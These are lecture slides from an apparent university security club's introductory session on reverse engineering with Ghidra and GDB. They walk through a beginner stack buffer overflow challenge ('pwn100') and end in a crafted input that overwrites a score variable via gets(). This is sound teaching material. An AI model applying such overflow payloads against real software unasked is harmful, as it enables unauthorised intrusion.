1 of 41

How do programs work?

INTROSEC 2019

2 of 41

Obligatory links

3 of 41

In case you missed it

  • sudo apt install gcc-multilib
  • Password is ‘rpisec’

4 of 41

Tools we will be using (on the vm already)

  • Ghidra
  • GDB

5 of 41

What is a ghidra

  • Ghidra - A binary analysis toolset developed by the NSA and recently open sourced
    • Decompiler
    • Disassembler
    • Type system
    • Control flow graph
    • Exposes an api for all of this
    • And a lot more

6 of 41

For now Ghidra is just a static analysis platform

The NSA claims a debugger will be integrated soon™

For now we will just use GDB and just sync the two in our heads.

7 of 41

Ghidra 101

  • Tools VM has a convenient ghidra command in bash
    • If you’re on your own system, cd path/to/ghidra and then ./ghidraRun
  • Create a project
  • Import a binary
  • See lots of information (just press OK)
  • Double click your binary in the list
  • DRAGONS
  • Wow, that’s a lot of analysis options! Just use the defaults

8 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View

9 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View

10 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View

11 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View

12 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View

13 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View

14 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View

15 of 41

Ghidra 101

It has a lot of features:

  • Symbols
    • Functions
  • Disassembly
  • Decompiler
  • Graph View
  • Java … scripting??
    • Out of scope

16 of 41

How does a function get its arguments

Each block is 4 bytes of data� (doubleword)

Registers such as ESP and EBP are a doubleword

0x00000000

……...

ESP ----------->

Local Var | param1

Local Var | param2

Local Var | param3

Local Var | param4

EBP ----------->

Local Var | param5

Previous EBP

Return address

0xffffffff

……...

17 of 41

DEMO TIME?

18 of 41

Stuff you kinda just gotta know

Two hex characters are one byte, so 0x00-0xff are all values in a byte 0-255, 0xffff is 2 bytes…

When displaying bytes it is very common to use hex

All data at the end of the day is just bytes your program can just choose to treat them as ints vs chars etc... or even code…………..

19 of 41

pwn100

Each block is 4 bytes of data� (doubleword)

Chars are 1 byte

Ints are 4 bytes

Registers such as ESP and EBP are a doubleword

0x00000000

……...

ESP ----------->

foo[0:4]

foo[4:8]

foo[8:12]

foo[12:16]

foo[16:20]

Int points

EBP ----------->

Local Var | param5

20 of 41

pwn100

Let’s improve the disassembly

Name variables by pressing L

……...

local_28

local_24

local_20

local_1c

local_18

local_14

local_10

local_c

.........

21 of 41

pwn100

What do we name them?

Look at how they’re used and just make up something believable

……...

local_28

local_24

local_20

local_1c

local_18

local_14

local_10

local_c

.........

22 of 41

pwn100

Then just press L and rename

(Ghidra closes the graph view to refresh, just re-open it)

……...

local_28 ⇒ “name”

local_24

local_20

local_1c

local_18

local_14

local_10

local_c

.........

23 of 41

pwn100

Okay that seems to make sense

Protip: see all uses of a variable by middle clicking it�(Mac users: use a mouse or change it in the settings)

……...

local_28 ⇒ “name”

local_24

local_20

local_1c

local_18

local_14

local_10

local_c

.........

24 of 41

pwn100

Where are 24 → 18?

Ghidra thinks they are part of “name”

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14

local_10

local_c

.........

25 of 41

pwn100

local_14?

Looks like the points variable

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10

local_c

.........

26 of 41

pwn100

local_c?

Isn’t used in the stuff we care about

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........

27 of 41

pwn100

So the disassembly matches up with our expected stack frame layout

……...

foo[0:4]

foo[4:8]

foo[8:12]

foo[12:16]

foo[16:20]

Int points

……..

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........

28 of 41

Back to pwning

So what does this function do?

  • A good place to look is at all the call instructions
  • puts, gets, printf, system
  • We want to get to system eventually

29 of 41

Back to pwning

How does gets work? Read the manual!

bash$ man gets

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........

30 of 41

Back to pwning

So we read bytes into name with no check for buffer overrun...

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........

31 of 41

Back to pwning

We gets into name, which is 20 bytes and right below points

……...

local_28 ⇒ “name”[0:4]

local_24 ⇒ “name”[4:8]

local_20 ⇒ “name”[8:12]

local_1c ⇒ “name”[12:16]

local_18 ⇒ “name”[16:20]

local_14 ⇒ “points”

local_10 ⇒ ¯\_(ツ)_/¯

local_c ⇒ ¯\_(ツ)_/¯

.........

32 of 41

Back to pwning

What if we spam the alphabet?

ABCDEFGHIJKLMNOPQRSTUVWXYZ

‘A’ == 0x41 ‘B’ == 0x42 Etc

man ascii

Endianness makes this confusing

……...

0x44 43 42 41 DCBA

local_28 ⇒ “name”[0:4]

0x48 47 46 45 HGFE

local_24 ⇒ “name”[4:8]

0x4c 4b 4a 49 LKJI

local_20 ⇒ “name”[8:12]

0x50 4f 4e 4d PONM

local_1c ⇒ “name”[12:16]

0x54 53 52 51 TSRQ

local_18 ⇒ “name”[16:20]

0x58 57 56 55 XWVU

local_14 ⇒ “points”

0x?? ?? 5a 59 ??ZY

local_10 ⇒ ¯\_(ツ)_/¯

...

local_c ⇒ ¯\_(ツ)_/¯

...

.........

33 of 41

Back to pwning

So we can set points to whatever we want

What does it need to be?

Check the cmp!

Oh, thanks Ghidra.

34 of 41

Side step to make Ghidra’s UI less bad

Edit the code layout and drag the Operands box

Government-quality UI right here, folks

35 of 41

… back to pwning

So we can set points to whatever we want

What does it need to be?

Check the cmp!

36 of 41

Back to pwning

So points ⇒ 0x1337d00d

Replacing the UVWX with those bytes

Again, endianness: 0d d0 37 13

……...

0x44 43 42 41 DCBA

local_28 ⇒ “name”[0:4]

0x48 47 46 45 HGFE

local_24 ⇒ “name”[4:8]

0x4c 4b 4a 49 LKJI

local_20 ⇒ “name”[8:12]

0x50 4f 4e 4d PONM

local_1c ⇒ “name”[12:16]

0x54 53 52 51 TSRQ

local_18 ⇒ “name”[16:20]

0x13 37 d0 0d ????

local_14 ⇒ “points”

0x?? ?? 5a 59 ??ZY

local_10 ⇒ ¯\_(ツ)_/¯

...

local_c ⇒ ¯\_(ツ)_/¯

...

.........

37 of 41

Back to pwning

So our final input is ABCDEFGHIJKLMNOPQRST\x0d\xd0\x37\x13

Time to gdb!

……...

0x44 43 42 41 DCBA

local_28 ⇒ “name”[0:4]

0x48 47 46 45 HGFE

local_24 ⇒ “name”[4:8]

0x4c 4b 4a 49 LKJI

local_20 ⇒ “name”[8:12]

0x50 4f 4e 4d PONM

local_1c ⇒ “name”[12:16]

0x54 53 52 51 TSRQ

local_18 ⇒ “name”[16:20]

0x13 37 d0 0d .7Ð.

local_14 ⇒ “points”

0x?? ?? 5a 59 ??ZY

local_10 ⇒ ¯\_(ツ)_/¯

...

local_c ⇒ ¯\_(ツ)_/¯

...

.........

38 of 41

GDB shows us how it works

Feel free to look at the older slides for how to GDB

Protip: Run python in gdb so you can debug weird input

gdb-peda$ run < <(python -c 'print("\x41\x41\x41\x41")')

^ This spacing is necessary. Thanks, gdb!

39 of 41

Demo

gdb-peda$ run < <(python -c 'print("\x41\x41\x41\x41")')

^ This spacing is necessary. Thanks, gdb!

40 of 41

Demo

Remember branchier from Friday?

41 of 41

Next Steps

  • Check out the decompiler!
    • … wow that’s a lot easier to read
  • Look at some other programs
    • Try the examples from Friday
    • https://pwnable.kr (try ‘bof’)
    • https://crackmes.one/search try some veryeasy/easy challenges to get used to looking at binarys
  • We’re continuing on Friday with pwn200
    • If you feel adventurous, try it :)